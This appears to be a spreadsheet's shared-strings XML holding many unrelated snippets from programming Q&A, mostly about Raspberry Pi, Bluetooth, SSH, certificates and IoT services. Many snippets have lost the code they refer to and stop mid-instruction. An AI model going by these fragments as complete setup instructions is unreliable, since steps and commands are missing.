Note #3: Registering agent using pexpect (just a note if you try to run the code posted below) with BlueZ 5.43 (default version in Stretch) is hit and miss
Below is a Python 2.7 code that sets sspmode and handles pairing with pregenerated PIN:
Final note: After successful pairing it might be posibble to turn encryption on, try:
hciconfig hci0 encrypt
or
hcitool enc $BDADD</t>
  </si>
  <si>
    <t>~/.nvm/nvm.sh
Add these lines to your ~/.bashrc, ~/.profile, or ~/.zshrc file to
  have it automatically sourced upon login:
export NVM_DIR="$HOME/.nvm" [ -s "$NVM_DIR/nvm.sh" ] &amp;&amp; .</t>
  </si>
  <si>
    <t>It does so by removing the need for hand-coding anonymous variables as part of a test's Fixture Setup phase.</t>
  </si>
  <si>
    <t>The index of the array is held by a variable storeKeysIndex is initialized to 0 and when a key is pressed, the value of pressed key is stored in storeKeys array and the value of storeKeysIndex is incremented.</t>
  </si>
  <si>
    <t>The command line then prompts with Password: so I typed the password in and I got the following:
 locale is "enGB.UTF-8"
 locale charset is "UTF-8"
 using default charset "UTF-8"
 1&gt;
As there are no errors present I can only assume that this has worked?</t>
  </si>
  <si>
    <t>Make sure the format is correct: Invalid RS256 public key"
When I debug the my code, the pem public certificate looks fine.</t>
  </si>
  <si>
    <t>BTW your signal handler calls non-async-signal-safe functions (so is undefined behavior).</t>
  </si>
  <si>
    <t>For this, I have added the following line in crontab file:
Now inside the serverfile.sh, I have put the following:
The file execution permissions has been given and it can print an echo command when modified.</t>
  </si>
  <si>
    <t>The output is:
NOT
raspberrypi login: username
password: password
next command: emulation station
next command: sudo systemctl start lightdm
next command: exit
So the terminal just hangs, expecting a password.</t>
  </si>
  <si>
    <t>* @returns {Object} Object that must contain a 'username' and 
 *          'password' key/value pair
 */
DigestAjax.authHelper = function() {
    return {
        username: '',
        password: ''
    };
};
////////////////////////////////////////////////////////////////////////////
//      HA1/Username Store
////////////////////////////////////////////////////////////////////////////
/**Temporary storage of a generated HA1 value*/
DigestAjax.UNAUTH_HA1 = null;
/**
 * If Digest authentication succeeds, the temporary HA1 is transferred to 
 * this value, where it is used for future requests.</t>
  </si>
  <si>
    <t>Apache Utils are the tools provided by Apache Web Server, which includes:
ab: Apache benchmark tool
logresolve: Resolve IP addresses to hostname in logfiles
htpasswd: Manipulate basic authentication files
htdigest: Manipulate digest authentication files
dbmmanage: Manipulate basic authentication files in DBM format, using perl
htdbm: Manipulate basic authentication files in DBM format, using APR
rotatelogs: Periodically stop writing to a logfile and open a new one
split-logfile: Split a single log including multiple vhosts
checkgid: Checks whether the caller can setgid to the specified group
check_forensic: Extract mod_log_forensic output from apache log files
httxt2dbm: Convert rewrite map in  format to .dbm format for better performance
(and more)
For Debian-based Linux, it can be installed via:</t>
  </si>
  <si>
    <t>Activating ssh
Add a file called  in the boot partition of the sd card (not the /boot folder in the root partition).</t>
  </si>
  <si>
    <t>Grunt-prompt is a grunt task that lets you Add interactive UI to your Gruntfile such as lists, checkboxes, text input with filtering, and password fields, all on the command line</t>
  </si>
  <si>
    <t>Signing a tag or commit in Git is a method of verifying the author of that specific tag or commit using a private key.</t>
  </si>
  <si>
    <t>If none login will be done, uses the init.d to start is at boot.</t>
  </si>
  <si>
    <t>You are missing to register the agent in bluetoothctl for prompting.</t>
  </si>
  <si>
    <t>Now, a._array points to the char array of the temporary and that is how the invalid results come to be.</t>
  </si>
  <si>
    <t>Now you need to add my public key because I signed the packages.</t>
  </si>
  <si>
    <t>Or, if you are able to open and edit the login.txt, do that, and replace each of the br with a new line.</t>
  </si>
  <si>
    <t>Find the line 1:2345:respawn:/sbin/getty 115200 tty1 and change it to #1:2345:respawn:/sbin/getty 115200 tty1
Under that line, add 1:2345:respawn:/bin/login -f pi tty1 &lt;/dev/tty1 &gt;/dev/tty1 2&gt;&amp;1.</t>
  </si>
  <si>
    <t>2:) if apn has password and username they also should be passed before using
3:) if required before at+sapbr commands the first command try</t>
  </si>
  <si>
    <t>Your code will have access to the full text of the public and private keys and certificate.</t>
  </si>
  <si>
    <t>Additional users can be added by using the htpasswd shell command or by appending new lines to the file.</t>
  </si>
  <si>
    <t>tcpdump is a common packet analyzer that runs under the command line.</t>
  </si>
  <si>
    <t>If you pass a policy to this operation, the temporary security credentials that are returned by the operation have the permissions that are allowed by both the access policy of the role that is being assumed, and the policy that you pass.</t>
  </si>
  <si>
    <t>Finally I got the solution in this case, all I needed to do, is pass empty string as accesskey, secret key and session token while creating the device and then device credential as the device is created.</t>
  </si>
  <si>
    <t>Edit the telegrambot.py file and change the line
To contain your token instead of Bot Token
Finally change the lines (or add new ones):
to match whatever command you would like to send.</t>
  </si>
  <si>
    <t>But if I add the data back into the package, the server says the package is not valid.</t>
  </si>
  <si>
    <t>But since we are not using the anonymous variables and method, which will be nil and hence path will also evaluate to nil since method is nil.</t>
  </si>
  <si>
    <t>What it does is to take a 1024 bytes string, encrypt it with a key, then encrypt the result with the same key, and again and again.</t>
  </si>
  <si>
    <t>i'm working on a authentication system with raspberry pi with the Fingerprint Scanner - TTL (GT-511C3) and i have a function that create a template and returns as result the following :
I want to extract only th data part so i did like this : response 1['Data']
but when i print it i get this :
i added this as header of my file :
and i tried a couple of solutions i found in the forum but i couldn't find one that works with me.</t>
  </si>
  <si>
    <t xml:space="preserve"> will assign value 3 to variable a
unless a is readonly variable, if a=3 always returns TRUE
same for if a=4
To compare variable a with a value, you can do this if [ $a = 3 ]
so the script should change to 
Since a is read from user input, there is possibility user key in:
non numeric value
a string with empty space
nothing, user may just press Enter key
so a safer way to check is:
if [ "x$a" = "x3" ]</t>
  </si>
  <si>
    <t>When I create the certificates using OpenSSL and the 'New-CACertsEdgeDevice myGateway' commands, I end up with an Elliptical Curve based private key which fails when I configure the edge gateway with the message 
"Currently RSA is only supported".</t>
  </si>
  <si>
    <t>Since begin() method takes argument char, which is null-terminated string, password is truncated.</t>
  </si>
  <si>
    <t>when i set this parameter to true
then I got CONN_REFUSED_NOT_AUTHORIZED
when isShared is set to false, all is working.</t>
  </si>
  <si>
    <t>Connection error to Iot Hub:" + e.Message);
   }
In my logs:
3/12/2019 8:53:11 AM info: iotedged -- Finished configuring certificates.</t>
  </si>
  <si>
    <t>https) as this mitigates any replay attacks and will help your URL format from being determined by an eavesdropper.</t>
  </si>
  <si>
    <t>You have to be able to forward port 80 from your router (the one with the Public Static IP) to the private (NAT) IP of the PI; both on port 80.</t>
  </si>
  <si>
    <t>You should be able by the following command:
You do not need to run ssh as superuser with root privileges (therefore no  needed) but you must use a username that exist on the ubuntu box!</t>
  </si>
  <si>
    <t>If you were not already logged in it will ask you to authenticate and then return to your callbackuri after authentication with your authentication token attached at the end of the url like
Where CODE is your authentication code.</t>
  </si>
  <si>
    <t>If I connect with even only one client (my PC or my smartphone) after some time the NodeMCU-board crashes with this message:
PANIC: unprotected error in call to Lua API (SO-WebSrv-Test.lua:27: out of memory)
I used this code from Marcel Stoer who answered on a similar "running out of memory" question.</t>
  </si>
  <si>
    <t>See: 'npm help config'
I've checked using npm config get proxy, this returns null so I don't think this is a proxy issue.</t>
  </si>
  <si>
    <t>So now, the terminal on my laptop is ssh'd into the pi and my projector is still showing the same screen with the command prompt text I have written above.</t>
  </si>
  <si>
    <t>Once the load at line 34 takes place, the device is still detectable on LAN but wlan0 and eth0 are unresponsive and port scanning returns null.</t>
  </si>
  <si>
    <t>I want to connect to a api and send a token key parameter to this server and return the text from that page.</t>
  </si>
  <si>
    <t>I have navigated inside the directory - /usr/local/lib/python3.4/dist-packages/google/auth/transport/  and I have found the requests.py file.</t>
  </si>
  <si>
    <t>I set all of the privileges for the SQL server on the SQL database allowing any computer to join that's on the network, I can connect to the database from the Ubuntu computer with the command: 
This command returns this error on the RPI.</t>
  </si>
  <si>
    <t>Currently pairing setup is Just Works, and when a client connects to the device they are prompted to pair and thus are bonded with key exchange (although it looks like Justworks disables MITM when I did more investigation for this question).</t>
  </si>
  <si>
    <t>I edit the file /etc/crontab to add my task :
59 23 * * * root /home/pi/backupdb.sh
And my backupdb.sh is :
mysqldump --user USER --password=PASS areadb &gt; backupdb.txt
If anyone can give some help ?</t>
  </si>
  <si>
    <t>In the code below one may observe that a testVector has a name to identify it, a unique key, plain text, and cipher text.</t>
  </si>
  <si>
    <t>In a nutshell, the first call should be
token will point to a null-terminated string of the first field, namely "$GPGGA".</t>
  </si>
  <si>
    <t>Your login shell most likely does add those system paths to $PATH, which is whywhen starting your Node app from the command linethe shutdown executable works just fine.</t>
  </si>
  <si>
    <t>When an application calls CryptographicEngine.SignAsync, the underlying code requests access to the private key to do the signing at which point the user is asked if they want to allow the application to access the certificate private key.</t>
  </si>
  <si>
    <t>One way to solve it would be to make InitSerial not private (internal or public) and have it return Task.</t>
  </si>
  <si>
    <t>The problem is because  and tTransport are only defined if useUnsecuredWebsockets is True
Since useUnsecuredWebsockets is set to False a few lines before this will never happen.</t>
  </si>
  <si>
    <t>MQTT-Broker can be also configured to use Identity from authorization Public/Private Key pair as Username.</t>
  </si>
  <si>
    <t>Firstly, you need to read the remote file from uri, parse the buffer to base64 string, and then import the certificate to your store.</t>
  </si>
  <si>
    <t>According to the C# documentation the ToDouble method throws FormatException whenever the input string is invalid.</t>
  </si>
  <si>
    <t>Unicode characters with code above 0xFFFF, are encoded in UTF-16 by pairs of 16-bit code units called **surrogate pairs**.</t>
  </si>
  <si>
    <t>The NEM blockchain software is used in a commercial blockchain called Mijin, which is being tested by financial institutions and private companies in Japan and internationally.</t>
  </si>
  <si>
    <t>Passing passwords on the command line is inherently insecure and can cause password exposure.</t>
  </si>
  <si>
    <t>See Command Line Processing for advice on how to structure your identify command or see below for example usages of the command.</t>
  </si>
  <si>
    <t>Supports publickey, password and keyboard-interactive authentication methods
Supports RSA and DSA private key
Supports DES-EDE3-CBC, DES-EDE3-CFB, DES-CBC, AES-128-CBC, AES-192-CBC and AES-256-CBC algorithms for private key encryption.</t>
  </si>
  <si>
    <t>So you should mark it final when you implicitly make a class final by making it's constructor private.</t>
  </si>
  <si>
    <t>percent-encoding which has been used to transform between plain text and valid URI.</t>
  </si>
  <si>
    <t>Void safety, or static protection against calls on null references, through the attached-types mechanism.</t>
  </si>
  <si>
    <t>After a service restart these line have been logged: 
So the starting lines are logged but the end messages are not.</t>
  </si>
  <si>
    <t>I just tired this out using Postman with both valid and invalid ETAG values - with an invalid ETAG value I see the same error message:
With a valid ETAG, I see the expected 204 status returned.</t>
  </si>
  <si>
    <t>A spy is XUnit pattern where you replace the original implementation with a test double to capture the calls on the object.</t>
  </si>
  <si>
    <t>Namespace-aware identifier completion (including local bindings, names visible in the current module, and module names).</t>
  </si>
  <si>
    <t>If the date or time or datetime value specified as string is illegal, the function returns NULL.</t>
  </si>
  <si>
    <t>I've tried adding the TabletMode and SignInMode registry entries to the DefaultAccount registry location:
I've tried checking  in my UWP app and it is Touch as expected.</t>
  </si>
  <si>
    <t>If you want to create a package without publishing to Store, you need to create a new certificate for your app when you change the publisher name in package manifest.</t>
  </si>
  <si>
    <t>Run 
Run installoemcerts.cmd to install Test Sign Certificates on the system
Run following command to export feature cabs.Assuming C:\a8016aaattnwza21120000.2_db410c_bsp is where the BSP was extracted to.</t>
  </si>
  <si>
    <t>This is probably easiest done by replacing this:
with the following line, in your main project file:
If the configuration looks correct, you may want to try verifying the JWT with something like jwt.io.</t>
  </si>
  <si>
    <t>This extension provides a custom namespace in order to create a mock or a spy in a Spring context, for example : 
A subproject springockito-annotations allows you to use annotations in your test to replace with a mock or wrap with a spy without touching the real beans inm your Spring context.</t>
  </si>
  <si>
    <t>Tested locally (Windows 7), a user logs in using a fingerprint reader and calls a log report in our php code, I also call the function needed to unlock the lock.</t>
  </si>
  <si>
    <t>After that, calling Status Or Networks (with correct credentials) endpoints start to return valid HTTP OK 200 response.</t>
  </si>
  <si>
    <t>Here is the code: 
But I am getting this error: 
I/sh: type=1400 audit(0.0:31): avc: denied { read } for name="/" dev="mmcblk0p6" ino=2 scontext=u:r:untrusted_app:s0:c512,c768 tcontext=u:object_r:rootfs:s0 tclass=dir permissive=1
I/sh: type=1400 audit(0.0:32): avc: denied { open } for path="/" dev="mmcblk0p6" ino=2 scontext=u:r:untrusted_app:s0:c512,c768 tcontext=u:object_r:rootfs:s0 tclass=dir permissive=1
W/System.err: java.io.IOException: Cannot run program "su": error=13, Permission denied
W/System.err:     at java.lang.ProcessBuilder.start(ProcessBuilder.java:983)
W/System.err:     at java.lang.Runtime.exec(Runtime.java:691)
W/System.err:     at java.lang.Runtime.exec(Runtime.java:524)
W/System.err:     at java.lang.Runtime.exec(Runtime.java:421)
How can I mount the USB device using from my application on Android Things?</t>
  </si>
  <si>
    <t>The command I am running to encrypt the file on (a) is 
The command I am running to decrypt the file on (b) is
However when I run the second command I get the error:
bad decrypt
140736032883756:error:06FFF064:digital envelope routines:CRYPTO_internal:bad decrypt:/BuildRoot/Library/Caches/com.apple.xbs/Sources/libressl/libressl-22.200.3/libressl-2.6/crypto/evp/evp_enc.c:533:
When I attempt this with two Macs, it works fine.</t>
  </si>
  <si>
    <t>Since the String you've cast is within the scope of the function, the memory is freed when the function returns and the pointer is essentially invalid.</t>
  </si>
  <si>
    <t>EDIT:
The path was actually invalid.</t>
  </si>
  <si>
    <t>Therefor we assume the following POC with the hope of clarification and best practise:
we implement a iot edge module (azure-iot-sdk-java)
we open module connection to iotedge and suscribe to desired properties
the module identity gets as desired property the ip of the real device and the azure device identitiy connection string.</t>
  </si>
  <si>
    <t>To prevent it from showing, solve the power issue, or remove rpi warnings (not a safe approach), by adding to /boot/config.txt :</t>
  </si>
  <si>
    <t>Putting the code from the loop into this if statement "if (conn.connect(server_addr, 3306, user, password))" also does not return the correct result.</t>
  </si>
  <si>
    <t>I added this line in the  file in my Pi (right at the bottom):
And then i gave it 755 permissions.</t>
  </si>
  <si>
    <t>Can create applications using public data such as the National Provider Identifier (NPI) or secure, private clinical data from hospitals.</t>
  </si>
  <si>
    <t>Add a new line to the configuration file setting the authentication method for  to md5.</t>
  </si>
  <si>
    <t>In asymmetric cryptography a key is actually a pair consisting of a public key and private key.</t>
  </si>
  <si>
    <t>Generally speaking, if you attempt to read an encrypted GATT characteristic before pairing (which triggers the pairing logic automatically), this results in GATT error 137 returned from the read request ().</t>
  </si>
  <si>
    <t>I'm wanting to set my ipod as a trusted bluetooth device on my raspberry pi running raspian via command line using bluez-tools.</t>
  </si>
  <si>
    <t>However if user 2 comes and knows pass2, after entering the pass2, the gate will open for 10 seconds and then pass2 becomes invalid, in a nutshell a password can be used only once.</t>
  </si>
  <si>
    <t>Newsgroups/articles say just 'put a file called "SSH" into the /boot/ folder, but how can you do this from windows?</t>
  </si>
  <si>
    <t>After generating a new key pair in the device, can the JWT also be used to authenticate uploading the new public key to the registry?</t>
  </si>
  <si>
    <t>As per Wikipedia  ...Networking device hostnames ending with .local are often employed in private networks.</t>
  </si>
  <si>
    <t>While getting the scan results if the advertiser device does not have an UUID set dev_uuid 
returns null and cannot print or anything.</t>
  </si>
  <si>
    <t>Also, ASDoc generates an index of all public and protected methods and properties.</t>
  </si>
  <si>
    <t>Optionally use .valid() to test the form for validity and get a boolean result of that test.</t>
  </si>
  <si>
    <t>ASP.NET MVC and ASP.NET MVC Core is supported by the ITfoxtec Identity SAML 2.0 MVC and MVC Core packages, which helps to integrate the ITfoxtec SAML 2.0 package into a MVC og MCV Core application.</t>
  </si>
  <si>
    <t>verdaccio is an open source npm private and proxy registry for Node.js packages.</t>
  </si>
  <si>
    <t>Another is to use a manually generated public-private key pair to perform the authentication.</t>
  </si>
  <si>
    <t>It can help you:
test your apps with fake network data (stubbed from file) and
simulate slow networks, to check your application behavior in bad
network conditions 
write unit tests that use fake network data from
your fixtures.</t>
  </si>
  <si>
    <t>I obtained the server certificate from command line in .crt format and saved to /usr/local/share/ca-certificates/ folder.</t>
  </si>
  <si>
    <t>As @class said, you need to wget the Google root certificate (wget https://pki.google.com/roots.pem) and then pass the path to downloaded roots.pem for the --ca_certs argument.</t>
  </si>
  <si>
    <t>You can directly from VS Code push your custom module into your private container registry, e.g.</t>
  </si>
  <si>
    <t>The exception that is thrown when a method call is invalid for the object's current state.</t>
  </si>
  <si>
    <t>Usually, a public key is also available from the certificating authority - it provides the option for the user or organization to test it against the own private key which is used for signing.</t>
  </si>
  <si>
    <t>Pipe definitions may be downloaded by calling  where PIPE_ID is the pipe's unique identifier.</t>
  </si>
  <si>
    <t>Hence, you need to add the credentials for it in order for the edgeAgent to be download images from private registries: 
Through the Azure Portal: In the first step of "Set Modules"
When done through deployments in Visual Studio Code: 
"In the VS Code explorer, open the .env file.</t>
  </si>
  <si>
    <t>Nor does the example; try without it
A single unexpected character on the serial line will disable your notification LED; consider requiring a specific string to turn it off, so that an innocuous command like esp8266.write("hello from esp\n") (or println()) leaves it on.</t>
  </si>
  <si>
    <t>In it I've tried invoking node in two ways
First :
Second :
su -l "pi" -c "/usr/local/bin/node /var/www/server.js"
In both cases my node app throws the same exception as when I try to run it from the command line without "sudo", so I'm assuming it's still not getting the right permissions it needs to run.</t>
  </si>
  <si>
    <t>Here is /etc/mosquitto/mosquitto.conf:
pid_file /var/run/mosquitto.pid
persistence true
log_dest file /var/log/mosquitto/mosquitto.log
allow_anonymous true
include_dir /etc/mosquitto/conf.d
sudo service mosquitto stop
sudo service mosquitto start:
mosquitto version 1.4.8 terminating
mosquitto version 1.4.8 (build date Sun, 14 Feb 2016 15:06:55 +0000) starting
Config loaded from /etc/mosquitto/mosquitto.conf.</t>
  </si>
  <si>
    <t>The set up is accessible from my home from one of my new Raspberry Pi 3 with a built-in wifi that I dedicate to connecting to the test box and it's private network.</t>
  </si>
  <si>
    <t>I've made a simple website in HTML/CSS for a private local network at home and all the PCs and phones are Windows10.</t>
  </si>
  <si>
    <t>I want to send USB commands which I used to do in desktop apps by opening a SafeFileHandler and then writing commands.</t>
  </si>
  <si>
    <t>I have setup a "thing -&gt; certificates, keys -&gt; policy -&gt; Rule" in AWS IOT,
When i try to connect to the thing from my command line using 
it returns 
connect: No such file or directory connect:errno=0
What is the problem and How can i debug this ?</t>
  </si>
  <si>
    <t>I think it may be related to the SHA256 signature combined with URL escaping the string but I am not sure how to test/verify this.</t>
  </si>
  <si>
    <t>If you didn't need to convert into an integer, it would have been easier to tokenise the string yourself by using a for loop and checking if the character is equal to ':' since the string is so short.</t>
  </si>
  <si>
    <t>And you need to be root to edit this file:  (on raspbian)  
There is already an auto login process at startup, for the standard pi user, so you just need to add your command line for starting node.</t>
  </si>
  <si>
    <t>Please make sure you have checked the Private Networks (Client &amp; Server) Capability in the server app's Package.appxmanifest, then test the connection among different devices.</t>
  </si>
  <si>
    <t>The AWS SDK for NodeJS is provided to your lambda out of the box.There's no need to require or package additional node modules)
Your code can become as simple as this (notice that there are no credentials or extra node modules required) :</t>
  </si>
  <si>
    <t>The Fakes framework can be used to shim any .NET method, including non-virtual and static methods in sealed types.</t>
  </si>
  <si>
    <t>In other words: it should not test whether the database is accessible or whether the user has entered an empty string -- those are outside factors.</t>
  </si>
  <si>
    <t>That program uses SSH to log into a bunch of db nodes, where it sets up the distributed system you're going to test using the test's pluggable os and db.</t>
  </si>
  <si>
    <t>There are multiple versions ADFS 2.0 on WS2008/R2, ADFS in WS2012 (also called 2.1), ADFS in WS2012R2 (also called 3.0) and ADFS in WS2016 (also called 4.0)
ADFS provides authentication services for applications over standard protocols.</t>
  </si>
  <si>
    <t>So it would need have a password prompt before the data gets unencrypted - this will be achieved via a terminal command and not in Javascript; I'm not sure if commands can be entered into the terminal via JS?</t>
  </si>
  <si>
    <t>I have appended my code in DT arch/arm/boot/dts/bcm2708-rpi-b.dts 
And my driver code looks like 
It is not able  to register and create spi device
dmesg =&gt;
[  213.352758] spi-bcm2835 20204000.spi: chipselect 0 already in use
[  213.352781] spi_master spi0: spi_device register error /soc/spi@7e204000/aartyaa_3008
[  213.352799] spi_master spi0: Failed to create SPI device for /soc/spi@7e204000/aartyaa_3008
spi_bcm2835 and spi_bcm2835aux are added to system.</t>
  </si>
  <si>
    <t>for ex: 
1knock &gt;&gt; run app &gt;&gt; run enter_password()
for i range 4 &gt;&gt; 5 loop 
loop 1 &gt;&gt;1knock &gt;&gt;my pass &gt;&gt; 1
loop 2 &gt;&gt; 7knock &gt;&gt;my pass &gt;&gt; 17
loop3 &gt;&gt; 4knock &gt;&gt;my pass &gt;&gt; 174
loop 4 &gt;&gt; 0knock &gt;&gt;my pass &gt;&gt; 1740
loop 5 &gt;&gt; 2knock &gt;&gt;my pass &gt;&gt; 17402
my pass &gt;&gt; 17402
if ok &gt;&gt; open door #serach by another function in my db and return ok or not ok 
else &gt;&gt; nothing
and go to standby and wait for 1 knock to run app and again and again .</t>
  </si>
  <si>
    <t>If validation succeeds, True is returned:
document = {'name': 'john doe'}
v.validate(document)
True
Documentation
See the Cerberus website.</t>
  </si>
  <si>
    <t>The split() call is giving you less than six results, and then your attempt to access tokens[5] (and tokens[4] for that matter) fails because those don't exist.</t>
  </si>
  <si>
    <t>Sometimes, you are using a proxy without knowing it :
You should check proxy env variables :
If you do not have a proxy, Check your .bashrc and remove their definition.</t>
  </si>
  <si>
    <t>These methods take arguments that specify the blog author's username and password along with information related to an individual weblog entry.</t>
  </si>
  <si>
    <t>AppxManifest.xml(37,10): error 0x80070490: Cannot register the
  test-uwp_1.0.0.0_arm__yzekw4x8qxe1g package because the following
  error was encountered while parsing the windows.fileTypeAssociation
  Extension element: Element not found.</t>
  </si>
  <si>
    <t>Quote from docs:
 does the following:
If the user isnt logged in, redirect to settings.LOGIN_URL, passing
  the current absolute path in the query string.</t>
  </si>
  <si>
    <t>I am implementing the following code using javascript in browser to create certificate and key pair:
and I am getting the ERROR as : 
UnknownOperationException: null
    at Object.s [as extractError] (https://sdk.amazonaws.com/js/aws-sdk-2.106.0.min.js:42:24512)
    at constructor.o (https://sdk.amazonaws.com/js/aws-sdk-2.106.0.min.js:42:29401)
Please help me in resolving this error.</t>
  </si>
  <si>
    <t>You can use it to add new or replace existing certificate.</t>
  </si>
  <si>
    <t>Update:
If you get the following error when using PowerShell to create certificates:
Add a variable named "OPENSSL_CONF" to system environment variables:
Add a new system path variable points to OPENSSL bin directory like this:</t>
  </si>
  <si>
    <t>I have tried running the command SSH -Y root@ and starting xclock as a test.</t>
  </si>
  <si>
    <t>Or is there any other way to create .p12 file with received certificate and private key in swift 2.3?</t>
  </si>
  <si>
    <t>Error is:
But when I connect with SSH and start script with manually on command line after this error it starts perfectly.</t>
  </si>
  <si>
    <t>I also tried running it through /etc/rc.local but it starts running before the login prompts which i don't want.</t>
  </si>
  <si>
    <t>See the following for reference:
http://www.cyberciti.biz/faq/howto-linux-add-user-to-group/
http://fedoraproject.org/wiki/Administration_Guide_Draft/Apache#Apache_File_Security
Neal</t>
  </si>
  <si>
    <t>This method creates a new device with your device id and returns the primary key of your device.</t>
  </si>
  <si>
    <t>A False/Forbidden image URL.</t>
  </si>
  <si>
    <t>The full structure of our program is as follows:
Scan for bluetooth devices (iBeacons)
Save the output result    &lt;---- Here's the problem
Filter the desired data
Send to server node
As this is a part of a program we're building, the commands are executed through Java code that executes the terminal command, and returns the output as a String.</t>
  </si>
  <si>
    <t>A new element deny-uncovered-http-methods is added to web.xml so that the behavior of those HTTP methods for the given URL patterns can be configured easily.</t>
  </si>
  <si>
    <t>First I started trying out the command prompt of windows 10 with built-in ssh.</t>
  </si>
  <si>
    <t>I can't figure out how to pass credentials to my private registry.</t>
  </si>
  <si>
    <t>I need to upload my codes using Arduino IDE via command line.</t>
  </si>
  <si>
    <t>Even better, and to get rid of the need to somewhere type the sudo password, add the three commands without sudo to /etc /rc.local just before the .</t>
  </si>
  <si>
    <t>Those pointers will immediately become invalid when the function returns.</t>
  </si>
  <si>
    <t>Notice that each observer exposes an id function returning a string which identifies it.</t>
  </si>
  <si>
    <t>Features
Register SIP User Agents using the SIP over WebSocket transport
Create Audio and Video sessions
Send Instant Messages and view Presence
Share your screen or desktop
Utilize advanced call features such as early media, call hold and resume, and transfers
Send DTMF with SIP INFO
100% open source, 100% JavaScript
All major browsers supported
Homepage: https://sipjs.com/</t>
  </si>
  <si>
    <t>As in below anonymized command
I have generated service-key using cf create-service-key command.</t>
  </si>
  <si>
    <t>For instance, a missing token at line 7 can be compensated by the appearance of the same token at line 10.</t>
  </si>
  <si>
    <t>Cause: A search condition was entered with an invalid or missing relational operator.</t>
  </si>
  <si>
    <t>STARTTLS is an extension to plain text communication protocols, which offers a way to upgrade a plain text connection to an encrypted (TLS or SSL) connection instead of using a separate port for encrypted communication.</t>
  </si>
  <si>
    <t>The C program does not detect the string the Arduino sends, and the next string sent ends up corrupting the first.</t>
  </si>
  <si>
    <t>Gemfury is a hosted repository for your public and private packages, where they are safe and within reach.</t>
  </si>
  <si>
    <t>First, you need to install the  package to use sudo:
After you need to edit the sudoers file and add your username to it.</t>
  </si>
  <si>
    <t>There's an example right in the NodeMCU repo at https://github.com/nodemcu/nodemcu-firmware/blob/master/lua_examples/email/send_email_smtp.lua
I assume you did replace the placeholder at do_next count 2/3 with the base64 encoded username and password?</t>
  </si>
  <si>
    <t>Use string.split():
If invalid input is given, this will  to ask until inputs are valid.</t>
  </si>
  <si>
    <t>If you call both on the same request, then you will likely get an IllegalStateException: response already committed in the server logs whenever the second call is made.</t>
  </si>
  <si>
    <t>Digital signatures generally make use of a public-private key pair.</t>
  </si>
  <si>
    <t>It consists of a private/public key pair, and a .mobileprovision file that must be installed on the target device for debugging.</t>
  </si>
  <si>
    <t>I then put up a firewall rule on the raspi to open port 1600 like so:
The command  displays the following:
 TCP    10.3.10.200:1600       0.0.0.0:0              LISTENING
But when i run the command Test-NetConnection -Port 1600 "ComputerName"  (on a computer in the same subnet) i get
WARNING: TCP connect to (fe80::4d23:cb14:dcf6:dc5b%9 : 1600) failed
ComputerName     : ComputerName
RemoteAddress    : 10.3.10.200
RemotePort       : 1600
InterfaceAlias   : Ethernet
SourceAddress    : 10.3.10.69
TcpTestSucceeded : True
I can ping the raspi without problems.</t>
  </si>
  <si>
    <t>Online Resources:
Testing chapter of the reference manual for the Spring Framework
Spring Framework project web site
Spring TestContext Framework documentation
Spring MVC Test Framework documentation
Related Tags:
spring
spring-mvc
spring-aop
spring-jdbc
spring-jms
spring-boot
spring-security
spring-integration
spring-batch
spring-data
spring-webflow
junit, junit4, junit5, junit-jupiter
testng
unit-testing
integration-testing</t>
  </si>
  <si>
    <t>Consider using the 'await' operator to await non-blocking API calls, or 'await Task.Run
Code:
public sealed partial class MainPage : Page
    {</t>
  </si>
  <si>
    <t>But I got an error saying it contains invalid filesystem format option 'addressing physical'
After some googling, I know it has something to do with the new fs format in subversion 1.9, so I tried to upgrade the svn in raspberry pi, but I couldn't.</t>
  </si>
  <si>
    <t>In the Launch Soft Debugger Window that appeared:
Command : ssh YourRaspiLogin@RasPiPassword -L 10000:127.0.0.1:10000 
Arguments : &lt;leave empty&gt;
IP : YourRasPiHostNameOrIPAddress
Port: : 10000
Click "Connect".</t>
  </si>
  <si>
    <t>(This should be as easy as passing the URL directly to  but the server is requests based on user agent so we have to fake it.)</t>
  </si>
  <si>
    <t>- ["wifi.ap.pass", "YOURPWD"]
  - ["wifi.ap.hostname", "configure.yourdomain.com"]
In this example, I am also using the new hostname option added in December 2017 - once you connect to your device, you can visit that hostname and you should be prompted for your actual wifi SSID/password.</t>
  </si>
  <si>
    <t>Home-Assistant is an open source home automation that puts local control and privacy first.</t>
  </si>
  <si>
    <t>Tokenize a string: Examples in various languages - Rosetta Code
Tokenization (lexical analysis) - Wikipedia
Text segmentation - Wikipedia</t>
  </si>
  <si>
    <t>If they use an invalid format, they will be notified instantly in an non-obtrusive fashion ensuring you get the right customer information.</t>
  </si>
  <si>
    <t>rfacebook - R package allow to access Facebook's API
to get information about public pages, groups, and posts, as well as some of the authenticated user's private data.</t>
  </si>
  <si>
    <t>UDPipe can do tokenization, parts-of-speech tagging, lemmatization and dependency parsing of raw text.</t>
  </si>
  <si>
    <t>I've tried changing the connection string to just random characters, but then I get the error that the connection string is invalid.</t>
  </si>
  <si>
    <t>So if you deploy a new module to your edge device you'll see some Edge Agent twin traffic related to that.</t>
  </si>
  <si>
    <t>There are several ways to use SSH; one is to use automatically generated public-private key pairs to simply encrypt a network connection and then use password authentication to log on.</t>
  </si>
  <si>
    <t>An anonymous method treats a block of code as an entity that can be assigned to a variable or used as a parameter to a method.</t>
  </si>
  <si>
    <t>In my case I'm using WPA/PSK for secure access and after modifying the country code and adding the network entry, the content of the file looks something like this:
country=CH
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
update_config=1
# home network; allow all valid ciphers
network={
    ssid="home"
    scan_ssid=1
    key_mgmt=WPA-PSK
    psk="very secret passphrase"
}
ssid="home" is the WLAN network name (SSID) of the WLAN router or access point.</t>
  </si>
  <si>
    <t>I got my new raspberry pi, finished the setup, gave it static ip, and was able to ssh it from my Mac using:
Then I installed both Fuse and SSHFS from here, then read this and this and this and did the below in my Mac:
But did not get the SSHFS drive appearing in my desktop or any where else, I'm at macOS Mojave.</t>
  </si>
  <si>
    <t>Program start:
Functions:
Main loop: 
captureImageDownload()
createFolder()
renameFiles(ID)
Now I have two files that are created on the desktop see image below:
https://i.imgur.com/DDhYe1L
Is it due to file permissions knowing that I am not the root user?</t>
  </si>
  <si>
    <t>when i try to ssh connection from my android app to raspeberry using hostname "raspberrypi.local" and port is "2222" showing a error message connection refused but when i excute same code using a static local ip its working.</t>
  </si>
  <si>
    <t>Click the Verify button to compile the code, and look at the path following the -o option in the first line of output.]</t>
  </si>
  <si>
    <t>I've tested nmap_lan on my command line, and it produces privileged-user nmap output when run by an unprivileged user who normally gets only limited output.</t>
  </si>
  <si>
    <t>The subscriber can then filter to things like: 
